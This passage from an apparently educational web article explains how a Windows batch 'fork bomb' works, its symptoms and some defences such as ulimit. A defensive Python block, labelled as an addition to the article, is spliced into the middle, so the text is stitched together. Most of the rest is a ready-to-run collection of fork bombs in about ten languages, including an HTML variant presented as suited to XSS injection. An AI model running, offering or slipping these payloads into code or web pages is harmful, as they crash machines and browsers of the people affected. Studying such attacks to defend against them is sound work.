The above is a shorter alternative. To better understand how the Fork Bomb Batch File virus works, let us rewrite the code so that a beginner can follow what the batch file is doing. Note that this new code does EXACTLY the same thing as the code above; it is just written at a beginner level:

The Fork Bomb Batch File Virus Explained Step by Step (How does it work?)

:thestart
start %0
goto thestart

1) The first line creates a label named :thestart. As you already know, a label in a batch file is a point in the file that execution jumps to when a goto thestart is reached.

2) The second line, start %0, runs another copy (process) of itself (RUNME.BAT). Note that this process is another copy in memory doing the exact same thing, because %0 in a batch file stands for the name of the batch file in which it is used, in this case RUNME.BAT.

3) The third and last line, goto thestart, directs execution of the batch file to the specified label (an infinite loop with no exit). In this case the current process of RUNME.BAT goes back to line 1 and then loads ANOTHER process of RUNME.BAT in memory, and this repeats exponentially and indefinitely, or until memory resources are exhausted and the system crashes.

Symptoms after execution of Fork Bomb Batch File Virus code: (dependent on system resources)

  • Machine will be sluggish at first.
  • Machine might slow down.
  • Machine might halt.
  • Machine might restart.
  • The environment (sandbox) you're running in (if any) will terminate or restart.

Illustration of Fork Bomb Batch File Virus

Fork Bomb Batch File Virus Illustration: Every child becomes a parent exponentially wasting memory.

Fork Bomb Batch File Virus runs in windows with task manager loaded

Every program doubling itself is a form of exponential growth. After one iteration of the loop, two programs (2^1) are created. After another cycle, each of those two creates another two, for a total of four (2^2). Then after 10 iterations we have 1024 (2^10) instances of our little batch file. After 100 iterations we have 2^100 = 1.267 nonillion, a number so big you don’t even know what ‘nonillion’ is (it’s 10^30).

The first instance will likely not even complete 50 iterations before the system grinds to a halt and crashes. For such a simple script, each individual iteration would hardly take a few milliseconds, so the first few iterations complete very quickly and soon it becomes more than what the computer can handle.

Is there a way to protect against fork bombs? Yes.

Any antivirus would be able to scan this suspicious executable file and warn the user before execution. As a fork bomb’s mode of operation is entirely dependent on being able to create new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit -u 30 would limit the affected user to a maximum of thirty owned processes.
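The per-user process cap described above, applied to one untrusted command instead of a whole login session. This is an added example, not code from the original article; it assumes Linux with Python 3, and the function names run_capped, capped_limits and limits_seen_by_child are chosen here for illustration.

```python
import resource
import subprocess
import sys


def capped_limits(max_procs):
    """Return the (soft, hard) RLIMIT_NPROC pair to apply for the requested cap."""
    _, hard = resource.getrlimit(resource.RLIMIT_NPROC)
    # An unprivileged process cannot go above its current hard limit,
    # so clamp the request instead of letting setrlimit() fail.
    if hard != resource.RLIM_INFINITY and max_procs > hard:
        max_procs = hard
    return (max_procs, max_procs)


def run_capped(cmd, max_procs=30, timeout=10):
    """Run cmd under a process cap, like `ulimit -u max_procs` followed by cmd."""
    limits = capped_limits(max_procs)

    def apply_cap():
        # Runs in the child after fork() and before exec(). The cap is
        # inherited by everything cmd starts. Lowering the hard limit too
        # means an unprivileged child cannot raise it again.
        # Caveats: the kernel counts every process and thread of the same
        # user, not only this tree, and does not enforce the cap on root.
        resource.setrlimit(resource.RLIMIT_NPROC, limits)

    return subprocess.run(cmd, preexec_fn=apply_cap, capture_output=True,
                          text=True, timeout=timeout)


def limits_seen_by_child(max_procs=30):
    """Start a child under the cap and return the (soft, hard) limits it reports."""
    probe = "import resource; print(*resource.getrlimit(resource.RLIMIT_NPROC))"
    result = run_capped([sys.executable, "-c", probe], max_procs)
    soft, hard = result.stdout.split()
    return int(soft), int(hard)


if __name__ == "__main__":
    print("limits in this process:", resource.getrlimit(resource.RLIMIT_NPROC))
    print("limits inside the capped child:", limits_seen_by_child(30))
```

Because the limit is counted per user, run untrusted scripts under a dedicated unprivileged account so the cap does not also starve that user's normal sessions.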

The fork bomb in other common languages and scripts:

Bash

 :(){ :|:& };:

The trick here is that : is a function name — otherwise it is identical to:

 bomb() { bomb | bomb & }; bomb

Same as above, but encoded into a standalone shell script as opposed to a shell function:

#!/bin/bash
./$0|./$0&

Windows Batch File

:TOP
 start "" %0
 goto TOP

The same as above, but shorter:

%0|%0

The same as above, but done in command line using ^ to escape specials:

echo  %0^|%0  > forkbomb.bat
forkbomb.bat

Perl

An inline shell example using the Perl interpreter:

perl -e "fork while fork" &

Python

 import os
 while 1:
     os.fork()

Java

public class ForkBomb
{
  public static void main(String[] args)
  {
    while(true)
    {
      Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
    }
  }
}

JavaScript

function bomb() {
  setTimeout(function() {
    for (;;) {
      bomb();
    }
  }, 0);
}

Other JavaScript

while (true) {
  var w = window.open();
  w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}

The following version is easier for injection (XSS):

<a href="#" onload="function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }">XSS fork bomb</a>

And the following is simply a more aggressive version of the above:

<script>
setInterval(function() {
  var w = window.open();
  w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>

C

#include <unistd.h>

int main(void)
{
    while(1) {
      fork(); /* malloc can be used in order to increase the data usage */
    }
}

Assembly (Linux running on IA-32)

section .text
    global _start
    
_start:
    mov eax,2 ;System call for forking
    int 0x80  ;Call kernel
    jmp _start

PowerShell

while($true) { 
    Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
    Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}

